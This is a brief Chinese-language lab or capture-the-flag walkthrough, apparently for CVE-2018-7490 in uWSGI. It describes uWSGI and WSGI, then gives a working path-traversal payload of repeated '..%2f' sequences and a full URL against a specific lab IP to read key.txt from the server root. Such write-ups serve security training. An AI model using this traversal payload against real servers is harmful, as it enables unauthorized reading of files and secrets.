uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。
目标:
了解uWSGI CVE-2018-7490漏洞形成原理和漏洞利用方法。
利用搜索工具了解CVE-2018-7490漏洞详情。再利用漏洞获取根目录key.txt的值。
解析思路
http://219.153.49.228:48001/..%2f..%2fkey.txt
.. 表示上一级
%2f表示/
在IP后面输入: ..%2f..%2f..%2f..%2f..%2f..%2f..%2fkey.txt